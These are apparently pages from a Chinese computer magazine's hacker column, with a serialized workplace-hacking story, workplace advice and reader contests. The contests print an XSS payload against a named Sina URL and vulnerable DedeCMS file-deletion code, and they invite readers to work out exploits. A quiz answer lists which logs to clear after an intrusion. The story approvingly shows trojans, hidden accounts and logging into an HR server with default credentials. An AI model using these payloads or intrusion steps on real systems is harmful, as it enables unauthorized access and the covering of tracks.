第一条：以工作为本。单位内部的恋爱，不管是否影响工作，总会给领导一种潜在的思维暗示——你工作不够专心。因此，职场新手必须把干好工作作为第一要务、立身之本，把恋爱放在次要位置，起码在工作时间是这样。要把工作做得比恋爱前做得更好更出色，避免受人以柄。
第二条：以同事为先。恋人关系的存在，往往打破了单位内部同事之间均等的、独立的、对称的朋友关系。这就要求同一单位的恋人，在处理工作事务和同事关系的时候，更要讲大局、讲风格、高姿态，做到先有同事、后有夫妻，更加注重坦诚、热情的和同事打成一片，注重及时与领导、同事坦率的交流思想、交换认识，减少同事对自己或配偶的无谓顾虑和猜忌。
第三条：以制度为重。“瓜田不纳履，篱下不整冠”，避嫌是非常中重要的，要遵守公司的各项制度和规定，不能借岗位和工作便利，为自己的恋人提供方便、违例违规，特别要尽量避免在直接上下级、涉及重大利益分配、存在制衡或监督关系的岗位上担任职务。情况特殊，必须担任的，要与上级领导做好汇报和沟通，避免招人闲话。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术问题的答案是和同一个数字异或两次还是自身。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：单机入侵需要清除哪些痕迹？
剧情题目：胖哥为什么要入侵那么多电脑（附上分析）？
想知道答案，请看毒辣辣求职记（9）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。


黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
远程操控


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，新浪网爆出跨站漏洞，可以被黑客利用来发动挂马攻击。跨站漏洞出在http://search.sina.com.cn/?c=news&range=title&t=''%22%3E%3Cscript%3Ealert(%22sitedir%22);%3C/script%3E%3C%22&ts=bpost&stype=all，出现的原因是过滤不严（见图），双引号的限制可以被绕过（输入"><script>alert("sitedir");</script><"）。

该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（9）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，他一次又一次地设计陷害毒辣辣。毒辣辣发动反击，发现了胖哥的秘密，掌握了胖哥的把柄，而此时胖哥也察觉到电脑有异常。胖哥会发现毒辣辣高的小动作吗？
连载地址：http://go.shudoo.com/g/hky.htm

心惊肉跳的胖哥
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：黑客如何自检电脑安全

故事提要：在如何处置胖哥秘密这件棘手事情上，毒辣辣和紫衣MM的意见各不相同。而经历了诸多磨难和挫折的毒辣辣，已经日渐成熟起来，掌握了关键证据的他并没有成功的喜悦，在经过一段思想斗争之后，选择了令人惊讶的解决方法……

意见不同
震惊之后，毒辣辣和紫衣MM开始商量如何处理这件严重而棘手的问题。胖哥对毒辣辣的刁难和陷害，紫衣MM可是看在眼里中，心中为毒辣辣愤愤不平，不过胖哥是毒辣辣的直接领导，她也没有什么其他想法。
可是现在，胖哥竟然入侵了公司重要人物的电脑，私自监控、记录他们的信息，无疑是自找死路，绝对不能放过他。
“毒辣辣，你将Excel文件交上去，我再帮你宣传宣传，让大家看清胖哥的真面目，保证让他吃不了兜着走！”
“这样不就搞得满城风雨了吗？不太好吧，我想想！”
“还想什么？你忘了他怎么刁难你的么？你忘了他怎么陷害你了么？你还是不是个男人，就不能犹豫和胆怯，赶紧把这件事情公布出来，让领导知道，影响越大越好，让胖哥成为众矢之的。记住，一定要痛打落水狗，哼！他竟然敢监控我的电脑，这次绝对不能饶了他！”
紫衣MM显得十分兴奋，一方面是见识了精彩刺激的黑客技术，另一方面是终于有了报复胖哥的机会，嘴里象打起了机关枪，冲着毒辣辣一通扫射：“噫？毒辣辣，你杂了，怎么和霜打的菠菜一样，你看你这出息样!”
与紫衣MM的兴奋相反，毒辣辣这时候显得比较沉闷。在来公司实习的这一段时间里，毒辣辣感到经历了很多的挫折和磨难，而这些挫折和磨难的谜底已经解开的时候，毒辣辣却有了一份曾经沧海难为水的稳重和冷静。
“这件事情背后恐怕不简单，容我再想想，你一定要保密呦！”毒辣辣慢吞吞地说道，正端着杯子喝水的紫衣MM忍不住“噗”的一声，喷了毒辣辣一头雾水。在毒辣辣抹着眼镜上的雾水的时候，生气的紫衣MM掉头跑了：“我不管你啦！”

自检电脑
不管如何掩饰，毒辣辣心事重重的样子，还是引起了胖哥的注意。胖哥有一种不好的预感，他似乎预感自己招了毒辣辣的道。出于黑客特有的敏感，胖哥决定检测一下电脑，让自己浮躁的心稳定下来。
胖哥点击“开始→运行”，输入“CMD”进入命令提示符窗口，输入netstat命令（见图），netstat命令的功能是显示网络连接、网络接口等信息，可以让胖哥知道目前有哪些网络连接正在运作。

胖哥仔细检查了所有的网络连接，有的连接外网，有的连接FTP服务器，可一个陌生的连接让他心一跳，是一个熟悉的内网地址——这个地址还是他分配给毒辣辣的。冷汗从胖哥的额头不断涌出。一般来说，如果中了蠕虫病毒或者中了远程控制木马，就会启动网络连接，高手通过IP地址很容易就分辨出来。
胖哥调出嗅探工具Dsniff，它是一款嗅探工具，可以用来寻找入侵的痕迹。利用嗅探工具，胖哥确定自己中了远程控制木马，心就一沉——这是胖哥最不愿意看到的结局。胖哥立即调出进程管理工具Wsyscheck，寻找免杀过的远程控制木马。
清除木马后，胖哥依然忐忑不安，不知道毒辣辣发现了什么。突然，他想到了一件事情，立即登录“圆月”服务器，定位到隐藏的Excel文件。文件还在，胖哥送了一口气，气还没有出完，有想到另外一个可能，立即使用隐藏账号登录紫衣MM的电脑，发现隐藏账号已经不存在了，胖哥的心凉了！

学会圆滑
就在胖哥自检电脑的时，毒辣辣离开了座位，进入了主任的办公室。他口述了自己的发现，将Excel文档交给主任。看完文档后的主任惊得目瞪口呆，几秒后平静了下来，不动声色的敲着桌子——每当他思考的时候就会做出这个习惯性动作。
“这个文档还有谁知道？”主任终于开口了。
“除了我，没有其他人知道。”毒辣辣隐瞒了知晓内情的紫衣MM。
“你认为现在应该怎么做？”主任继续问道。
“我会忘记这件事，主任你说怎么办就怎么办！”
“毒辣辣，你越来越成熟了，我看好你，希望实习期满后，你能顺利的留下了。”
“我一定会根据努力工作的。”

主任会怎么处理这件事呢？胖哥的结局会如何呢？毒辣辣是否可以正式入职？闹情绪的紫衣MM还会跟毒辣辣和好吗？毒辣辣求职记大结局，不容错过！

职场点评
本期，毒辣辣在处理棘手问题上显得非常冷静，尤其是面对快言快语的紫衣MM，愤怒异常的主任，都能保持冷静，没有被别人的情绪和观点影响，很值得称道。同时，毒辣辣在深入全面的思考之后，以大局为重、以团结为重、以未来为重，决定采取低调处理的方式。表现出了很高的觉悟、良好的修养、优秀的素质。
作为从大学步入社会的职场新手来说，面对更加复杂的人际关系，更加功利的人性欲望，甚至是不择手段的阴谋诡计，往往陷入许多困惑和矛盾之中，对价值观念、人生追求、品行修养产生新的认识和看法。
对年轻人讲，人格的完善、心态的成熟、精神的健康、道德的提升更为重要。没有一个好的心态、好的修养、好的价值追求，只能在现实生活中不断陷入困扰和矛盾之中。因此，这里也给诸位初入职场的朋友提个醒，大家要保持好的心态，从纷纷扰扰的世俗羁绊中解脱出来，用自己的辛勤劳动开创事业、创造美好生活。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术问题的答案是需要清除应用程序日志，安全日志，系统日志。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
兄弟们，你们关心过CMD中的网络连接吗？那些连接都是正常的吗？截图来晒晒，大家一起交流学习一下。发送截图，就有机会获得我们送出的2GB防病毒闪存。邮件请发送到pcw-chendx@vip.sina.com或者发送到http://go.shudoo.com/g/hky.htm，我们等着你！

黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
不能正常关机


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，织梦建站系统V5.6版爆出远程文件删除漏洞，该漏洞会导致黑客远程删除.jpg 、.gif 、.png 类型的文件。漏洞出在edit_face.php中，原因是过滤不严，导致漏洞出现的关键代码如下所示：
else if($dopost==''delold'')  //45行
{
        if(empty($oldface))
        {
                ShowMsg("没有可删除的头像！", "-1");
                exit();
        }
        $userdir = $cfg_user_dir.''/''.$cfg_ml->M_ID;
        if(!ereg(''^''.$userdir, $oldface))
        {
                $oldface = '''';
        }
        if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
        {
                @unlink($cfg_basedir.$oldface);
该漏洞到底如何利用？漏洞利用的具体方法是什么？大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（大结局）
毒辣辣初入职场，就得到主任的赏识，受到老同事胖哥的嫉妒，他一次又一次地设计陷害毒辣辣。毒辣辣发动反击，发现了胖哥的秘密，掌握了胖哥的把柄，制服了胖哥，两人握手言欢。实习期马上就要结束了，最终毒辣辣会留下来吗？还在生气的紫衣MM会跟他和好吗？
连载地址：http://go.shudoo.com/g/hky.htm

MM 工作 一个都没少
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：侵入电脑获取文件信息

故事提要：毒辣辣和紫衣MM暗自猜测公司高层会如何处置胖哥，两人的意见又不一致。就在两人讨论时，胖哥忽然跑来请毒辣辣吃饭，道出为难他的缘由，并暗中透漏了一个秘密给毒辣辣……

暗地猜测
“你说，主任会不会把这个事情报告公司高层，高层会怎样处理胖哥？”紫衣MM一边有滋有味地吃着毒辣辣买的哈根达斯，一边问毒辣辣——在毒辣辣甜言蜜语的“哄骗”加上“极品”雪糕的引诱下，原本就没怎么生气的紫衣MM也没有“摆谱”，两人又言归于好。
毒辣辣“肉疼”地看着紫衣MM身边他买的零食，漫不经心地答道： “其实，胖哥也没有造成多大损失和影响，再说家丑不外扬，我觉得这件事情有很大的可能会被低调处理这件……”
“切，你以为人家跟你这个胆小怕事的人一样！胖哥这次肯定要受处罚，说不定就会被炒鱿鱼呢！像他那种喜欢偷窥的人就该有这种下场。”
“没那么严重吧，我觉得不会！”
“不会？那你敢不敢打赌，谁输了，谁就要满足对方一个要求！好了，说定了！”紫衣MM不管毒辣辣答应不答应，信心满满地定下赌约。
“赌就赌！你……那……”毒辣辣嘀咕着，“你，那雪糕，给我咬一口……”
“去你的！”

特殊饭局
一周飞快地过去了，公司一切有序平静，没有任何重要消息传出。但这一周对胖哥来说，却是度日如年，短短一周，胖哥憔悴苍老了不少，似乎承受了极大的压力。
“毒辣辣，晚上有空吗？我们一起吃个饭吧！”在其他员工离开公司，毒辣辣按惯例收拾完卫生打算离开的时候，胖哥从格子间站了起来，邀请毒辣辣吃饭。
在饭桌上，胖哥喝了点酒后，已经有几分醉意了，向毒辣辣倾诉：“谢谢你，没有把这件事情公开出去，不然闹大了我就只有走人了。你来公司也有一段日子了，许多事情你可能也听说了一些。你说像我这样的，埋头苦干这么多年，却没什么发展……”
“胖哥，事情也怪我，我没有主动和你沟通，多多沟通我们就不会老这种矛盾了。这次的经验我会牢记的，以后一定跟大家打成一片，团队合作才是最重要的。”毒辣辣激昂的话让胖哥非常高兴，他听懂了话中的隐含的意思。
“如果大家多沟通，也没有这种事情了，大水冲到龙王庙，一家人不识一家人。来，干一杯！”胖哥一边劝酒一边提醒毒辣辣，“我监视公司员工的电脑，是有人授意的，原本想靠攀此上关系，走一条终南捷径，哎！你以后可要吸取我的教训，踏踏实实地工作吧！”
“和自己想的差不多！幸亏自己没有大肆宣扬这件事，不然……”毒辣辣暗道。
胖哥一扬脖子，又干了一口酒，神神秘秘地压低声音说道：“你知道吗？入职名单出来了，在人力资源部的办公平台可以找到，如果你有权限的话……不说啦，你懂的！”

喜被录用
毒辣辣的心一下子就被紧了，虽然他相信自己一定可以留下来，但早一天看知道结果自己就早一天安心。毒辣辣辗转反侧一晚上都难以入睡，他决定利用进入人力资源部的服务器，提前看看入职名单。
在“运行”输入“//IP地址”，看到了人力资源部服务器的登录界面，毒辣辣开始琢磨：“按照正常的流程，应该是需找服务器漏洞入侵并提权，可胖哥既然提示我……”，抱着试一试的心态，毒辣辣输入了服务器的默认管理员账号和密码，成功了！进入服务器的毒辣辣终于看到了入职名单……
几天后，实习期满的毒辣辣笔直地站在主任的面前，听着主任宣布自己合格并录用的消息，露出淡定的笑容。
当天晚上，在迷人的夜色下的江畔公园，毒辣辣和紫衣MM亲密的坐在石凳上，紫衣MM翘着嘴：“我输了，说吧，你有什么要求！”
“本来我已经忘了赌约，既然你提起了，那我就说了，我要求你亲我……”
“臭无赖，呸！”紫衣MM“狠狠”地捶了毒辣辣一拳，跑开了。
“哎呀！”毒辣辣坐的不稳，两脚朝天，从石凳子上“摔”到地上。
“哈哈哈，哈哈哈，别跑，回来……”
毒辣辣和紫衣MM那青春快乐的欢笑荡漾在灯影摇曳的河面上……

“毒辣辣求职记”历经二个半月，到此就正式结束了。据我们统计，约有31万热心的读者通过论坛、邮件、QQ群和手机四条途径参与了我们的互动，我们从中挑选了部分幸运读者赠送了一批小礼物和10个2GB防病毒闪存。
        此外，我们响应了热心的读者的要求，将“毒辣辣求职记”做成了电子版，欢迎大家到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块中下载，该论坛中还有黑客营的高手坐镇，如果你渴望更多的了解“毒辣辣求职记”中的黑客技术，可以在论坛中请教他们。

职场新人生存法则
法则1：主动适应职场
对职场新人来说，心中的职场是美好的，但现实中不一定就是。不同公司的职场环境不一样，有的职场环境好，有的职场环境不好，而你要学会主动改变自己，让自己去适应职场，而不是让职场来迁就你。
例如毒辣辣面对胖哥的刁难，没有拍桌子摔凳子走人，而是忍耐下来伺机反击。为了生活，很多时候你必须要忍，忍受领导的冤枉、同事的白眼、客户的瞎闹，甚至忍受还要忍受什么都涨就是工资不涨。

法则2：主动请教
主任叫胖哥带一下毒辣辣，可胖哥根本就没有教毒辣辣任何东西，这种情况非常普遍，在职场中经常上演。因为在职场中，别人没有义务来帮你，只有你自己主动请教问题、主动摸索问题，学习并掌握工作技巧，才能适应竞争激烈的职场。
此外，为了保持竞争力，不被公司裁掉，你一定要不断充电。利用任何机会、休息时间来完善和提高职业技能，保证自己一天一天被公司青睐，而不是一天一天被公司忽视，只有这样才能在公司中长久生存下去。

法则3：服从领导
在职场中，一定要学会尊重领导、服从领导。职场不比学校，领导不是老师，如果你不服管理，极有可能失去工作。对于领导的命令，你可以提出自己的意见，但最终一定要执行领导的命令——无论命令在你看来多么的不合理。
系列中的胖哥是毒辣辣的直属领导，尽管他对毒辣辣不好，但毒辣辣每次都认真执行了胖哥的命令，中间没有阳奉阴违，这点做的非常好，值得大家借鉴。此外，在职场中要注意不要干越权的事情，不要替领导做决定，这可是是超级大忌！需要请示的一定要请示，马虎不得。

法则4：多说多做
在职场中，多说少做会给人一种夸夸其谈、眼高手低的印象，这样做容易被鄙视；少说多做会给人一种沉默寡言、吃苦耐劳的印象，印象虽好但却不容易得到成功——做事的时候有你的份，吃糖的时候没有你的份。
所以，只有“多说多做”才是最好的方式，不仅有实际的工作表现，更能让领导知道你的工作成绩，这样才能更快的得到升迁。经常玩电脑的朋友，大多不善言辞，大家要平时多多注意，增加这方面的能力。

法则5：融入公司文化
每个公司都有自己的公司文化，你要尽量融入。最常见的是，公司举办的活动，例如聚餐、旅游等，你要尽可能的全部参加——这些活动为了不影响工作往往安排在非上班时间，如果不去表面看没有什么，但实际上就脱离了公司的群众，没有融入公司的文化，这样的人在裁员时是首先考虑的对象之一。

脆弱的办公安全
        “毒辣辣求职记”中的办公室安全问题，普遍存在于广大公司中，具有代表性。办公安全有哪些隐患呢？我们通过大量研究，发现主要有以下三种安全隐患。
        隐患1：乱窜的ARP病毒
        ARP病毒可以造成局域网瘫痪、导致办公室中的部分或者全部电脑上不了网，非常令人头疼。一旦办公室中有这种病的在流窜，就会严重影响办公效率。比较好的解决方法是安装带ARP防火墙功能的安全辅助工具。

        隐患2：默认共享和高危端口
        因为在局域网内，很多人对办公室电脑的安全不够重视，像默认共享、高位端口等一些基本的安全问题广泛存在。如果有人存心搞破坏，就会给利用这些安全隐患入侵防护不足的电脑。大家可以借助安全辅助工具发现安全防护薄弱之处，有针对性的进行修复。

        隐患3：敞开的个人隐私
        在办公室中，个人隐私容易泄漏，例如大家很容易就相互看到别人的电脑，知道同事在看什么，做什么；公司的网管监视员工的电脑等。我们会在以后推出相关的系列，在个人隐私安全上重点分析和推荐实用的防护方法。


       

下期预告
        黑客可以速成吗？可以快速成长为像毒辣辣那样的黑客高手吗？答案是肯定的。即使你没有丝毫安全基础，灵活运用高手编写的黑客工具，你一样可以在短时间内学会如何玩弄木马、免杀木马、寻找漏洞，照样注入攻击、PJ密码……
你想不想试试黑客工具的威力？机会来了！从下期开始，我们推出黑客工具系列，展示黑客工具的具体使用方法，并附加相应的实战经验。我们相信，认真学习了该系列后，一个新的你将诞生！

黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
游戏狂想曲